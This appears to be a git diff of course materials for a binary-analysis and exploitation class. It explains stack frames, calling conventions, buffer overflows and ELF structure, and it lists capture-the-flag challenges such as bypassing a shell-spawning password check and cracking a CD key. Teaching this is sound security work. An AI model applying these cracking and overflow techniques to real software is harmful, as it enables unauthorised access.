+The stack is also used to pass in parameters to functions. + +In the process of calling a function we can define two entities. +The callee (the function that gets called) and the caller (the function that calls). + +When a function is called, the caller pushes the parameters for the callee on the stack. +The parameters are pushed in reverse order. + +When the callee wants to get access to the parameters it was called with, all it needs to do is access the area of the stack that is higher up in reference to the start of it's frame. + +At this point it makes sense to remember the following cases: + +- When EBP+value is referred to it is generally a referral to a parameter passed in to the current function. +- When EBP-value is referred to it is generally a referral to a local variable. + +Lets see how this happens with the following code: + +```c +#include + +int add(int a, int b) +{ + int c; + c=a+b; + return c; +} + +int main() +{ + add(10,3); + return 0; +} +``` + +```text +pwndbg> pdis 0x080483ca +Dump of assembler code for function main: + 0x080483ca <+0>:,push ebp #save the old frame pointer + 0x080483cb <+1>:,mov ebp,esp #create the new frame pointer + 0x080483cd <+3>:,sub esp,0x8 #create space for local variables + 0x080483d0 <+6>:,mov DWORD PTR [esp+0x4],0x3 #push the last parameter of the function that is to be called + 0x080483d8 <+14>:,mov DWORD PTR [esp],0xa #push the second to last(the first in this case) parameter of the function that is to be called + 0x080483df <+21>:,call 0x80483b4 #call the function + 0x080483e4 <+26>:,mov eax,0x0 + 0x080483e9 <+31>:,leave + 0x080483ea <+32>:,ret +End of assembler dump. +pwndbg> pdis 0x080483b4 +Dump of assembler code for function add: + 0x080483b4 <+0>:,push ebp #save the old frame pointer + 0x080483b5 <+1>:,mov ebp,esp #create a new frame pointer + 0x080483b7 <+3>:,sub esp,0x10 #create space for local variables + 0x080483ba <+6>:,mov eax,DWORD PTR [ebp+0xc] #move the first parameter into the EAX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)+last_parameter(4 bytes)) + 0x080483bd <+9>:,mov edx,DWORD PTR [ebp+0x8] #move the second parameter into the EDX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)) + 0x080483c0 <+12>:,add eax,edx #add the registers + 0x080483c2 <+14>:,mov DWORD PTR [ebp-0x4],eax #place the result inside the local variable (c) + 0x080483c5 <+17>:,mov eax,DWORD PTR [ebp-0x4] #place the result inside the eax register in order to return it + 0x080483c8 <+20>:,leave + 0x080483c9 <+21>:,ret +End of assembler dump. +``` + +As you can see the parameters were pushed in reverse order, and the rule regarding the reference to EBP holds. + +If you don't understand why the offset for the parameters starts at EBP+0x08 and not EBP follow through with the next section. + +### Calling functions (call and ret) + +When calling a function the callee places the return address on the stack. +This address is nothing more than a bookmark so that execution can resume where it left off once the called function finishes execution. + +The last instruction in functions is usually a `ret` instruction that resumes execution to the callee. + +For a better understanding of function calling and returning, from an execution flow point of view, please follow through with the following tip. + +The call instruction could be translated to the following instructions: + +- `push eip` +- `mov eip, address_of_called_function` + +The ret instruction could be translated into `pop eip`. + +The visual depiction of how the stack looks while a program is executing can be found in section 2 but will be included here as well: + +![Stack Convention](https://security.cs.pub.ro/summer-school/wiki/_media/session/stack-convention.png) + +### Next Section Preview: Buffer Overflows + +Now that we have a complete overview of the stack we can step forward to stack based buffer overflows. + +A buffer overflow takes place when there is a lack of checking regarding boundaries and usually result in complete control of the program's instruction pointer. +This takes place when a buffer overflows its boundaries and overwrites the return address of a function. + +A typical example of buffer overflows can be seen in the following picture: + +![Buffer Overflow](https://security.cs.pub.ro/summer-school/wiki/_media/session/s5_buffer_overflow.jpg) + +## Challenges + +Use GDB and pwndbg to run the code provided in the Activities section. + +### 01. Challenge - Explore The Simple Password Protected Bash + +The executable gets input from the user and evaluates it against a static condition. +If it succeeds it then calls a `password_accepted` function that prints out a success message and spawns a shell. + +Your task is to use GDB and pwndbg to force the executable to call the `password_accepted` function. + +Gather as much info about the executable as possible through the techniques you have learned in previous sessions. + +Think of modifying registers for forcing the executable to call thefunction (there is more than one way of doing this). + +### 02. Challenge - Simple Password Protected Bash Destruction + +What is the condition against which your input is evaluated in the executable contained in the executable `sppb`? + +The ultimate goal is to be able to craft an input for the binary so that the `password_accepted` function is called (modifying registers while running the program in GDB is just for training purposes). + +### 03. Challenge - Domino + +Analyze the binary, reverse engineer what it does and get a nice message +back. + +### 04. Challenge - Call me + +Investigate the binary in `04-challenge-call-me/src/call_me` and find out the flag + +Hint: There is something hidden you can toy around with. + +Hint: The challenge name is a hint. + +### 05. Challenge - Snooze Me + +I wrote a simple binary that computes the answer to life, the universe and everything. +It swear it works... eventually. + +### 06. Challenge - Phone Home + +To protect their confidential data from those snooping cloud providers, the authors of `06-challenge-phone-home/src/phone_home` have used some obfuscation techniques. + +Unfortunately, the key feature of the application is now unreachable due to a bug. +Can you bypass the impossible condition? + +### 07. Challenge - Chain encoder + +How do you reverse something made to be ireversible, you are welcome to find out in this challenge. + +### 08. Challenge - Simple cdkey + +I found this software but i don't have the cd key, can you crack it for me? diff --git a/chapters/binary-analysis/executables-and-processes/drills/06-challenge-matryoshka/README.md b/chapters/binary-analysis/executables-and-processes/drills/06-challenge-matryoshka/README.md index 2dc02cb..f40361f 100644 --- a/chapters/binary-analysis/executables-and-processes/drills/06-challenge-matryoshka/README.md +++ b/chapters/binary-analysis/executables-and-processes/drills/06-challenge-matryoshka/README.md @@ -10,7 +10,9 @@ There's something more in the executable, isn't there? Vulnerability ------------- -There is a global variable storing an ELF file. The participant will retrieve it, find out what the XOR key is by matching the ELF header, extract the ELF file and run it. The executable is stripped to make things a little bit difficult for the participant. +There is a global variable storing an ELF file. +The participant will retrieve it, find out what the XOR key is by matching the ELF header, extract the ELF file and run it. +The executable is stripped to make things a little bit difficult for the participant. Exploit ------- @@ -20,7 +22,8 @@ Script in `./sol/exploit.py` Environment ----------- -Nothing special. The executable file is to be downloaded by the participant. +Nothing special. +The executable file is to be downloaded by the participant. Deploy ------ diff --git a/chapters/binary-analysis/executables-and-processes/reading/README.md b/chapters/binary-analysis/executables-and-processes/reading/README.md index cf31232..dfea5cc 100644 --- a/chapters/binary-analysis/executables-and-processes/reading/README.md +++ b/chapters/binary-analysis/executables-and-processes/reading/README.md @@ -1,9 +1,3 @@ ---- -linkTitle: Executables and Processes -type: docs -weight: 10 ---- - # Executables and Processes From a user's perspective, the main purpose of the computing system is to run applications. @@ -44,7 +38,7 @@ After the process starts, whatever happens is said to happen at / during **runti For this session we will first look at the process virtual address space and see how it is updated at runtime. We will then map that information to the program executable and what's hapenning at load-time. -We will then spend more time dissecting and executable and make the first steps on static analysis, the subject of the [next section](https://github.com/razvand/binary/tree/master/sessions/static-analysis). +We will then spend more time dissecting and executable and make the first steps on static analysis, the subject of the [next section](../../static-analysis/reading/). ## Process Memory Layout @@ -56,7 +50,7 @@ Let's write a simple Hello World application and investigate. **IMPORTANT:** Note that we have removed **Address Space Layout Randomization** for these examples. We'll explain this later. -``` +```c #include int main() { @@ -69,11 +63,13 @@ int main() } ``` -``` +```console $ gcc -Wall hw.c -o hw -m32 + $ ./hw & [1] 4771 Hello world + $ cat /proc/4771/maps 08048000-08049000 r-xp 00000000 08:06 1843771 /tmp/hw 08049000-0804a000 r--p 00000000 08:06 1843771 /tmp/hw @@ -93,20 +89,21 @@ fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack] ``` If we start another process in the background the output for it will be exactly the same as this one. -Why is that? The answer, of course, is virtual memory. +Why is that? +The answer, of course, is virtual memory. The kernel provides this mechanism through which each process has an address space **completely isolated** from that of other running processes. They can still communicate using inter-process communication mechanisms provided by the kernel but we won't get into that here. Shortly put, there would be two processes with the same name and with two **apparently** identical mappings, but still the two programs would be isolated from one another. An initial schematic of the memory layout would be the following: -![ELF Memory Layout](assets/elf-space.png) +![ELF Memory Layout](../media/elf-space.png) ### Executable As we have seen, there are three memory regions associated with the executable: -``` +```text 08048000-08049000 r-xp 00000000 08:06 1843771 /tmp/hw 08049000-0804a000 r--p 00000000 08:06 1843771 /tmp/hw 0804a000-0804b000 rw-p 00001000 08:06 1843771 /tmp/hw @@ -114,15 +111,15 @@ As we have seen, there are three memory regions associated with the executable: From their permissions we can infer what they correspond to: -* `08048000-08049000 r-xp` is the `.text` section along with the rest of the executable parts -* `08049000-0804a000 r–p` is the `.rodata` section -* `0804a000-0804b000 rw-p` consists of the `.data`, `.bss` sections and other R/W sections +- `08048000-08049000 r-xp` is the `.text` section along with the rest of the executable parts +- `08049000-0804a000 r–p` is the `.rodata` section +- `0804a000-0804b000 rw-p` consists of the `.data`, `.bss` sections and other R/W sections It is interesting to note that the executable is almost identically mapped into memory. The only region that is *compressed* in the binary is the `.bss` section. Let's see this in action by dumping the header of the file: -``` +```console $ hexdump -Cv hw | head 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 b0 83 04 08 34 00 00 00 |............4...| @@ -134,8 +131,9 @@ $ hexdump -Cv hw | head 00000070 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 |................| 00000080 00 80 04 08 6c 06 00 00 6c 06 00 00 05 00 00 00 |....l...l.......| 00000090 00 10 00 00 01 00 00 00 00 0f 00 00 00 9f 04 08 |................| + $ gdb ./hw -........... + gdb-peda$ hexdump 0x08048000 /10 0x08048000 : 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............ 0x08048010 : 02 00 03 00 01 00 00 00 b0 83 04 08 34 00 00 00 ............4... @@ -159,7 +157,7 @@ The process is called **binning**. Let's see how the brk evolves in our executable using strace: -``` +```console $ strace -i -e brk ./hw [ Process PID=1995 runs in 32 bit mode. ] [f7ff2314] brk(0) = 0x804b000 @@ -170,7 +168,7 @@ Hello world Let's test the fact that the `brk` does not decrease and that future malloc's can reuse previously freed regions: -``` +```c #include int main() { @@ -190,13 +188,14 @@ int main() } ``` -``` +```console $ strace -e brk ./hw [ Process PID=2424 runs in 32 bit mode. ] brk(0) = 0x804b000 brk(0) = 0x804b000 brk(0x806c000) = 0x806c000 +++ exited with 0 +++ + $ ltrace -e malloc ./hw hw->malloc(0) = 0x804b008 hw->malloc(100) = 0x804b018 @@ -241,7 +240,7 @@ Furthermore, after the regions are freed they are reused. In our example we had the following memory mappings: -``` +```text f7ded000-f7dee000 rw-p 00000000 00:00 0 f7dee000-f7f93000 r-xp 00000000 08:06 917808 /lib32/libc-2.17.so f7f93000-f7f95000 r--p 001a5000 08:06 917808 /lib32/libc-2.17.so @@ -259,7 +258,7 @@ As these are also ELF files you can see that they have similar patterns: multipl One more thing to note here is that large calls to `malloc` result in calls to `mmap2`: -``` +```c #include int main() { @@ -270,7 +269,7 @@ int main() } ``` -``` +```console # strace -e brk,mmap2 ./hw_large [ Process PID=3445 runs in 32 bit mode. ] brk(0) = 0x804b000 @@ -300,9 +299,10 @@ Since the heap and the mmap region do not have this limit imposed the optimizati Let's put this into perspective. You can view the current stack limit using `ulimit -s`. -``` +```console $ ulimit -s 8192 + $ python >>> hex(0xffffffff - 8192*1024) '0xff7fffff' @@ -314,8 +314,9 @@ This is probably an optimization. However, we can set the stack size to unlimited and the mmap allocation direction will reverse: -``` +```console $ ulimit -s unlimited + $ strace -e mmap2,brk ./hw_large [ Process PID=4617 runs in 32 bit mode. ] brk(0) = 0x804b000 @@ -335,7 +336,6 @@ Big allocation 0x55766008 ^Z [1]+ Stopped strace -e mmap2,brk ./hw_large - $ cat /proc/4617/maps 08048000-08049000 r-xp 00000000 08:06 1843771 /tmp/hw_large 08049000-0804a000 r--p 00000000 08:06 1843771 /tmp/hw_large @@ -358,7 +358,7 @@ As you can see, the big allocation is now towards the stack instead of towards t Returning to the main functionality of the stack, remember from the previous lab that local variables are declared on the stack. This translates into assembly code in the following way: -``` +```c int main() { @@ -370,7 +370,7 @@ int main() The C snippet would be translated into ASM something like: -``` +```text 0804840c
: 804840c: 55 push ebp 804840d: 89 e5 mov ebp,esp @@ -391,12 +391,12 @@ Apart from the mappings that appear in `/proc//maps` with `r--`, `rw-`, etc Thus, a read access at such a location will violate the permission of that region so the whole app will be killed by the signal received (unless it has a signal handler). Examples: -* Dereferencing a `NULL` pointer will try to read from `0x00000000` which is not (usually) mapped => `SIGSEGV` (read access on none) -* Writing after the end of a heap buffer (if the heap buffer is exactly at the end of a mapping) will determine writes into unmapped pages => SIGSEGV (write access on none) -* Trying to write to `.rodata` => SIGSEGV (write access on read only) -* Overwriting the stack with "AAAAAAAAAAAAAAAAAAA" will also overwrite the return address and make the execution go to `0x41414141` => SIGSEGV (execute access on none) -* Overwriting the stack and return address with another address to a shellcode on the stack => SIGSEGV (execute access on read/write only) -* Trying to rewrite the binary (`int *v = main; *v = 0x90909090;`) => SIGSEGV (write access on read/execute only) +- Dereferencing a `NULL` pointer will try to read from `0x00000000` which is not (usually) mapped => `SIGSEGV` (read access on none) +- Writing after the end of a heap buffer (if the heap buffer is exactly at the end of a mapping) will determine writes into unmapped pages => `SIGSEGV` (write access on none) +- Trying to write to `.rodata` => `SIGSEGV` (write access on read only) +- Overwriting the stack with "AAAAAAAAAAAAAAAAAAA" will also overwrite the return address and make the execution go to `0x41414141` => `SIGSEGV` (execute access on none) +- Overwriting the stack and return address with another address to a shellcode on the stack => `SIGSEGV` (execute access on read/write only) +- Trying to rewrite the binary (`int *v = main; *v = 0x90909090;`) => `SIGSEGV` (write access on read/execute only) ## Tutorials @@ -412,14 +412,14 @@ UNIX System V Release 4, which Sun co-developed, introduced the ELF object forma Later it was developed and published as part of the ABI (Application Binary Interface) as an improvement over COFF, the previous object format and by the late 1990s it had become the standard for UNIX and UNIX-like systems including Linux and BSD derivatives. Depending on processor architectures, several specifications have emerged with minor changes, but for this session we will be focusing on the [ELF-32](http://www.skyfree.org/linux/references/ELF_Format.pdf) format. -![Linking View and Execution View](assets/elf-link-exec.png) +![Linking View and Execution View](../media/elf-link-exec.png) The structure of an ELF file during the linking process is the same with that of an object file. The linking process involves collecting and combining code and data into a single file that will later be loaded into memory and executed. On the right hand side we can see how the the ELF file structure will be transformed in memory. **Sections** instruct the Linker while **Segments** instruct the Operating System. -![ELF Merging](assets/elf-merging.png) +![ELF Merging](../media/elf-merging.png) As we can see, the information inside the two program headers and the section headers gets merged as needed inside the more familiar program segments. The basic role of the ELF file format is to serve as a roadmap for the linker and the OS Loader to generate a running process. @@ -434,7 +434,7 @@ This way of doing things, still in use today, involves loading all of the code a This basically meant that, the required resources to run a program were determined by the number of instances, with no possibility of optimization. Running 10 instances of the same program meant that there was a lot of code duplication going on in the memory space. -![ELF Static Linking](assets/elf-static-linking.png) +![ELF Static Linking](../media/elf-static-linking.png) Along with the ELF format came a new way of doing things. Instead of linking all the source files that contained subroutines into the final binaries, separate binaries were organized in libraries that could be loaded per use case, on demand. @@ -443,21 +443,21 @@ The new process allowed for a much more efficient resource utilization and was n Running 10 instances of the same program now meant that only the volatile parts of those binaries would be duplicated. In cases where the same code can be reused, it is allocated only once and used by multiple instances of the same program. -![ELF Dynamic Linking](assets/elf-dynamic-linking.png) +![ELF Dynamic Linking](../media/elf-dynamic-linking.png) ### ELF Types There are several ELF types but the most common types we will be dealing with are: -* Relocatable Files -* Shared Objects -* Executable Files +- Relocatable Files +- Shared Objects +- Executable Files #### ELF Type - Relocatable Files Relocatable files are obtained using the core compiler and basically contain all the ELF information necessary except for data like external variables or subroutines that are present in other files. -``` +```console gcc -c -o reloc.o source.c gcc -c -fPIC -o reloc.o source.c ``` @@ -471,11 +471,11 @@ Shared libraries are loaded up at runtime as needed by an OS component named the Shared objects may include other shared objects and this aspect is very important because, when loading specific subroutines, the ELF file must provide its dependencies. As such, the process of dynamic linking does a breadth first search gradually building the full dependency list. -![Shared Objects](assets/elf-dependency.png) +![Shared Objects](../media/elf-dependency.png) You can view the list of shared object dependencies for any given binary as well as the addresses where they will be loaded in memory by using the `ldd` command. -``` +```console ldd /bin/ls linux-gate.so.1 => (0x00e02000) librt.so.1 => /lib/tls/i686/cmov/librt.so.1 (0x004f9000) @@ -491,14 +491,14 @@ ldd /bin/ls All libraries should adhere to a strict naming convention. Shared objects have two names: -* **soname** - that consists of the prefix `lib`, followed by the library name, then a `.so`, another dot, then the major version (e.g. `libtest.so.1`) -* **real name** - is actually a file name, that usually extends the **soname** by adding a dot and minor version number along with the release version (e.g. `libtest.so.1.23.3`) +- **soname** - that consists of the prefix `lib`, followed by the library name, then a `.so`, another dot, then the major version (e.g. `libtest.so.1`) +- **real name** - is actually a file name, that usually extends the **soname** by adding a dot and minor version number along with the release version (e.g. `libtest.so.1.23.3`) Additionally, each library source file should have an accompanying header file with the extension `.h` and the same name. Adhering to these naming conventions is quite important as dependencies are resolved based on the **soname**. -``` +```console gcc -c -fPIC libtesting.c ld -shared -soname libtesting.so.1 -o libtesting.so.1.0 -lc libtesting.o ldconfig -v -n . @@ -520,7 +520,6 @@ A good tutorial on how to create a basic shared object can be found [here](https They are regarded as the end result and contain all the information necessary to create a running process. - ### ELF Structure The following wiki sections on ELF structure are dense and are **not** meant to be known by heart. @@ -528,10 +527,10 @@ The following wiki sections on ELF structure are dense and are **not** meant to Tools of the trade are: -* readelf -* objdump -* ldd -* Ghidra/IDA (Ghidra is Open Source, while IDA is not and it is really expensive) +- readelf +- objdump +- ldd +- Ghidra/IDA (Ghidra is Open Source, while IDA is not and it is really expensive) The command outputs that follow are rather large so we will only be discussing the less obvious parts. We will also leave out information that's not really that important or generally weird. @@ -540,7 +539,7 @@ We will also leave out information that's not really that important or generally Using `readelf` is straight-forward enough: -``` +```console readelf -h program ELF Header: @@ -567,19 +566,19 @@ ELF Header: Below we will discuss the less evident aspects of the above output -* **Elf Identification** (16 bytes) +- **Elf Identification** (16 bytes) * **Magic** - the first bytes of the binary that identify the file as ELF * **Class** - identifies the type of ELF (ex: ELF-32, ELF-64) * **Data** - specifies the type of data encoding * **Version** - version of the ELF header * **OS/ABI** - version of the OS * **ABI** - version of the ABI specification -* **Type** - Relocatable, Executable, Shared Object -* **Machine** - Required Machine architecture to run the executable -* **Entry Point Address** - the memory address where the OS loader transfers control to the process code for the first time. -* **Start of Program Headers** - File offset where the array of program headers start -* **Start of Section Headers** - File offset where the array of section headers starts -* **Section Header String Table Index** - the index in the section table name where the information about the section name string table can be found +- **Type** - Relocatable, Executable, Shared Object +- **Machine** - Required Machine architecture to run the executable +- **Entry Point Address** - the memory address where the OS loader transfers control to the process code for the first time. +- **Start of Program Headers** - File offset where the array of program headers start +- **Start of Section Headers** - File offset where the array of section headers starts +- **Section Header String Table Index** - the index in the section table name where the information about the section name string table can be found #### Program Headers @@ -587,8 +586,8 @@ Below we will discuss the less evident aspects of the above output Again, `readelf` is used with minimum syntax: -``` -readelf -l program +```console +$ readelf -l program Elf file type is EXEC (Executable file) Entry point 0x8048330 @@ -621,17 +620,17 @@ Program Headers: The **Program Header** table features an array of structures that shows how parts of the file will be mapped into memory at runtime. The last parts of the output show what sections will be merged into various program headers before loading the ELF into memory and becoming segments. -* **Type** +- **Type** * **PHDR** - information about the program header table itself * **INTERP** - information about the null terminated string that specifies the path to the dynamic loader. This header is only present in executable that use shared object code * **LOAD** - use to specify a general purpose loadable segment * **DYNAMIC** - information necessary to the dynamic linking process -* **Offset** - offset from the beginning of the file where the segment begins -* **VirtAddr** - the address where the segment will start in memory -* **FileSz** - number of bytes occupied by the segment on disk -* **MemSiz** - number of bytes occupied by the segment in memory -* **Align** - specifies a boundary to which the segments are aligned on file and in memory +- **Offset** - offset from the beginning of the file where the segment begins +- **VirtAddr** - the address where the segment will start in memory +- **FileSz** - number of bytes occupied by the segment on disk +- **MemSiz** - number of bytes occupied by the segment in memory +- **Align** - specifies a boundary to which the segments are aligned on file and in memory Here are two resources to read about [GNU_RELRO](https://www.airs.com/blog/archives/189) and [GNU_STACK](https://guru.multimedia.cx/pt_gnu_stack/) **Program Headers**. @@ -639,7 +638,7 @@ Here are two resources to read about [GNU_RELRO](https://www.airs.com/blog/archi Section headers are the central piece of reference used to organize the ELF files both on disk and in memory. -``` +```console readelf -S program There are 30 section headers, starting at offset 0x1128: @@ -677,8 +676,8 @@ Section Headers: [29] .strtab STRTAB 00000000 0019e8 0001fd 00 0 0 1 ``` -* **Name** - is obtained by reading the value of the section names table at the specified index -* **Type** +- **Name** - is obtained by reading the value of the section names table at the specified index +- **Type** * **PROGBITS** - information that is given meaning by the program when loaded into memory * **NOBITS** - similar to PROGBITS in meaning but occupies no space in the file * **STRTAB** - contains the program string table @@ -686,31 +685,31 @@ Section Headers: * **DYNAMIC** - holds information necessary for dynamic linking * **DYNSYM** - holds a set of symbols used in the dynamic linking process * **REL** - holds relocation entries -* **Addr** - if the section is part of an executable it will hold the virtual address where the section could be found in memory. +- **Addr** - if the section is part of an executable it will hold the virtual address where the section could be found in memory. If not it would be 0. -* **Off** - offset from the beginning of the file to where the section starts -* **Size** - size of the section in bytes -* **ES** - size in bytes per entry, if fixed entry size is used -* **FLG** -* **X** - contains executable code -* **W** - contains writable code -* **A** - will be loaded into memory as-is during process execution -* **Al** - section alignment constraints +- **Off** - offset from the beginning of the file to where the section starts +- **Size** - size of the section in bytes +- **ES** - size in bytes per entry, if fixed entry size is used +- **FLG** +- **X** - contains executable code +- **W** - contains writable code +- **A** - will be loaded into memory as-is during process execution +- **Al** - section alignment constraints The **Inf** and **Lnk** columns have specific interpretations depending on the section type, as can be seen in the following image: -![ELF Sections Inf and Lnk](assets/elf-sect-inf.png) +![ELF Sections Inf and Lnk](../media/elf-sect-inf.png) Additionally, the raw contents of each section can be dumped using both `objdump` and `readelf`. -``` +```console readelf -x .got program Hex dump of section '.got': 0x08049ff0 00000000 .... ``` -``` +```console objdump -s -j ".got" program program: file format elf32-i386 @@ -730,7 +729,7 @@ Given the machine code of a binary, various elements inside it will use absolute The entire idea of shared libraries is that these can be loaded and unloaded on demand inside the memory space of whichever process needs them at whichever address is available. As such, a map of how to locate and relocate absolute data points inside the machine code is needed and that's where the symbol table comes in. -``` +```console readelf -s libtesting.so.1 Symbol table '.dynsym' contains 8 entries: @@ -777,22 +776,22 @@ Symbol table '.symtab' contains 27 entries: Some information on the symbols that may belong to external files or may be referenced by external files during dynamic linking are copied in the `.dynsym` section. -* Name - symbol name -* Type +- Name - symbol name +- Type * NoType - not specified * FUNC - the symbol influences a function * SECTION - associated with a section * FILE - a symbol that references a files -* Bind +- Bind * LOCAL - the symbol information is not visible outside the object file * GLOBAL - the symbol is visible to all the files being combined to form the executable -* Size - the size of the symbol in bytes or 0 if it is unknown -* Ndx +- Size - the size of the symbol in bytes or 0 if it is unknown +- Ndx * UND - unspecified section reference * COM - unallocated C external variable * ABS - an absolute value for the reference * value - an index into the section table -* Value - if the symbol table is part of an executable, the value will contain a memory address where the symbol resides. +- Value - if the symbol table is part of an executable, the value will contain a memory address where the symbol resides. Otherwise it will contain an offset from the beginning of the section referenced by Ndx or O. As you can see, the symbol table as it appears in object files compiled with gcc is quite verbose, revealing function names and visibility as well as variable scopes, names and even sizes. @@ -800,17 +799,17 @@ In its default form it even shows the name of the sourcefile. In order to subvert Reverse Engineering attempts you can check out some of the methods of stripping the symbol table of valuable information: -* [A Whirlwind Tutorial on Creating Really Teensy ELF Executables for Linux](http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html) -* [strip](https://sourceware.org/binutils/docs/binutils/strip.html) +- [A Whirlwind Tutorial on Creating Really Teensy ELF Executables for Linux](http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html) +- [strip](https://sourceware.org/binutils/docs/binutils/strip.html) #### Relocations Relocations were a concept that was present ever since the invention of static linking. The initial purpose of relocations was to give the static linker a roadmap when combining multiple object files into a binary by stating: -* The **Symbol** that needs to be fixed. -* **Where** you can find the symbol (file/section offset). -* An **Algorithm** for making the fixes. +- The **Symbol** that needs to be fixed. +- **Where** you can find the symbol (file/section offset). +- An **Algorithm** for making the fixes. The fixes would usually be made in the `.data` and `.text` sections and everything was well. Dynamic runtime brought a bit of a complication to modifications that needed to be made in the code segments. @@ -826,10 +825,10 @@ The initial call is made to a stub sequence in the **PLT** which bounces off a * Relocations and how they get applied are very complex topic and we will only try to cover as far is helps detecting file and symbol types If you want to read more you can refer to some of these resources: -* [Some Assembly Required](http://www.mindfruit.co.uk/2012/06/relocations-relocations.html) -* [Study Of ELF Loading and Relocs](http://netwinder.osuosl.org/users/p/patb/public_html/elf_relocs.html) +- [Some Assembly Required](http://www.mindfruit.co.uk/2012/06/relocations-relocations.html) +- [Study Of ELF Loading and Relocs](http://netwinder.osuosl.org/users/p/patb/public_html/elf_relocs.html) -``` +```console readelf -r libdynamic.o Relocation section '.rel.text' at offset 0x5f8 contains 8 entries: @@ -854,9 +853,8 @@ Relocation section '.rel.data.rel' at offset 0x648 contains 2 entries: 00000004 00000e01 R_386_32 00000000 so_fpublic_global ``` - -* **Offset** - In relocatable files and linked shared objects it contains the offset from the beginning of the section , where the relocation needs to be applied -* **Info** - This field is used to derive the index in the symbol table to the affected symbol as well as the algorithm needed for fixing. +- **Offset** - In relocatable files and linked shared objects it contains the offset from the beginning of the section , where the relocation needs to be applied +- **Info** - This field is used to derive the index in the symbol table to the affected symbol as well as the algorithm needed for fixing. * `info >> 8` - symbol table index * `info & 0xff` - algorithm type as defined in the documentation @@ -864,20 +862,20 @@ Relocation section '.rel.data.rel' at offset 0x648 contains 2 entries: By looking at the types of relocations we can draw some basic conclusions about the symbol types and also about the files. -* Relocatable Files +- Relocatable Files * **R_386_32** - usually used to reference changes to a local symbol * **R_386_PC32** - reference a relative distance from here to the symbol -* Relocatable Files for Shared object +- Relocatable Files for Shared object * **R_386_GOTOFF** - usually found in the code area, describes the offset from the beginning of GOT to a local symbol * **R_386_GOT32** - also speicific to the code area. These entries persist in the linkage phase * **R_386_PLT32** - used when describing calls to global subroutines. when the linker will read this information it will generate an entry in the GOT and PLT tables * **R_386_GOTPC** - used in function to calculate the start address of the GOT -* Executables that use Dynamic Linking +- Executables that use Dynamic Linking * **R_386_JMP** - the dynamic linker will deposit the address of the external subroutine during execution * **R_386_COPY** - the address of global variable from shared object will be deposited here -* Shared Object Files +- Shared Object Files * **R_386_JMP** - the dynamic linker will deposit the address of the external subroutine from one of the shared object dependencies during execution * **R_386_GLOB_DATA** - used to deposit the address of a global symbol defined in one of the shared object dependencies * **R_386_RELATIVE** - at link time all the R_386_GOTOFF entries are fixed and these relocation will contain absolute addresses @@ -899,12 +897,12 @@ All conventions regarding shared object names have been respected. Hints: -* Use `nm` to investigate the files, determine what pieces you need to put together and then link them with `gcc`. -* Check whether the files are compiled for 32 bits or for 64 bits and use the proper `gcc` command. +- Use `nm` to investigate the files, determine what pieces you need to put together and then link them with `gcc`. +- Check whether the files are compiled for 32 bits or for 64 bits and use the proper `gcc` command. If you do it correctly you will get an executable that you can run and get the following output: -``` +```text Congratulations extern var1 10 at 0x565fe020 extern var2 at 0x565fe030 @@ -923,16 +921,16 @@ You cannot modify any of the binaries in order to solve this task. Hints: -* Run the file, check what it is missing and build the missing component. +- Run the file, check what it is missing and build the missing component. Use `nm` to determine what symbols should be part of the missing component. -* Use `LD_LIBRARY_PATH=.` to run an executable file and load a shared library file from the current folder. +- Use `LD_LIBRARY_PATH=.` to run an executable file and load a shared library file from the current folder. ### 03. Memory Dump Analysis Using your newfound voodoo skills you are now able to tackle the following task. In the middle of two programs I added the following lines: -``` +```c { int i; int *a[1]; @@ -943,7 +941,7 @@ In the middle of two programs I added the following lines: The results were the following, respectively: -``` +```text 0x804853b 0x1 0x8048530 @@ -968,7 +966,7 @@ The results were the following, respectively: And: -``` +```text 0xbfffe7d0 0xd696910 0x80484a9 @@ -993,11 +991,11 @@ And: Try to tell: -* Which was running on a pure 32 bit system -* Which values from the stack traces are from the `.text` region -* Which do not point to valid memory addresses -* Which point to the stack -* Which point to the library/mmap zone +- Which was running on a pure 32 bit system? +- Which values from the stack traces are from the `.text` region? +- Which do not point to valid memory addresses? +- Which point to the stack? +- Which point to the library/mmap zone? ### 04. Compiler Flags @@ -1015,7 +1013,9 @@ There should be a flag message printed in case you solve it correctly. You will need to modify the executable. We recommend you install and use [Bless](https://packages.ubuntu.com/bionic/bless). -What actions does the program do? What functions does it invoke? What should it invoke? +What actions does the program do? +What functions does it invoke? +What should it invoke? Follow the actions from the entry point in the ELF file and see what is the spot where the program doesn't do what it should. @@ -1032,31 +1032,31 @@ You are given a binary that was stored on a USB stick in space where it was hit Fortunately, because the executable is so small, the only area damaged is the ELF header. Fix it and run it! -The structure of an ELF file is briefly presented here: http://i.imgur.com/m6kL4Lv.png +The structure of an ELF file is briefly presented [here](http://i.imgur.com/m6kL4Lv.png) -A more detailed explaination of the ELF header is presented here: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#Program_header +A more detailed explaination of the ELF header is presented [here](https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#Program_header) The entry point address should be `0x8048054`. -Review this tutorial on creating a minimal ELF file: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html +Review [this tutorial](http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html) on creating a minimal ELF file. ### Further Pwning -http://crackmes.cf/users/geyslan/crackme.02.32/ is a challenge that will test your knowledge from the first three sessions. +[This](http://crackmes.cf/users/geyslan/crackme.02.32/) is a challenge that will test your knowledge from the first three sessions. The password for the archive is `crackmes.de`. ### Further Reading -* [ELF-32](http://www.skyfree.org/linux/references/ELF_Format.pdf) -* [ELF-64](http://ftp.openwatcom.org/devel/docs/elf-64-gen.pdf) specification -* [list](https://elinux.org/Executable_and_Linkable_Format_(ELF)) of all ELF specification formats -* [ARM](https://developer.arm.com/documentation/ihi0044/e/) specification -* [Position Independent Code](https://wiki.gentoo.org/wiki/Hardened/Introduction_to_Position_Independent_Code) -* [Creating shared objects](https://www.ibm.com/developerworks/library/l-shobj/) -* [GNU_RELRO](https://www.airs.com/blog/archives/189) -* [GNU_STACK](https://guru.multimedia.cx/pt_gnu_stack/) -* [ELF Special 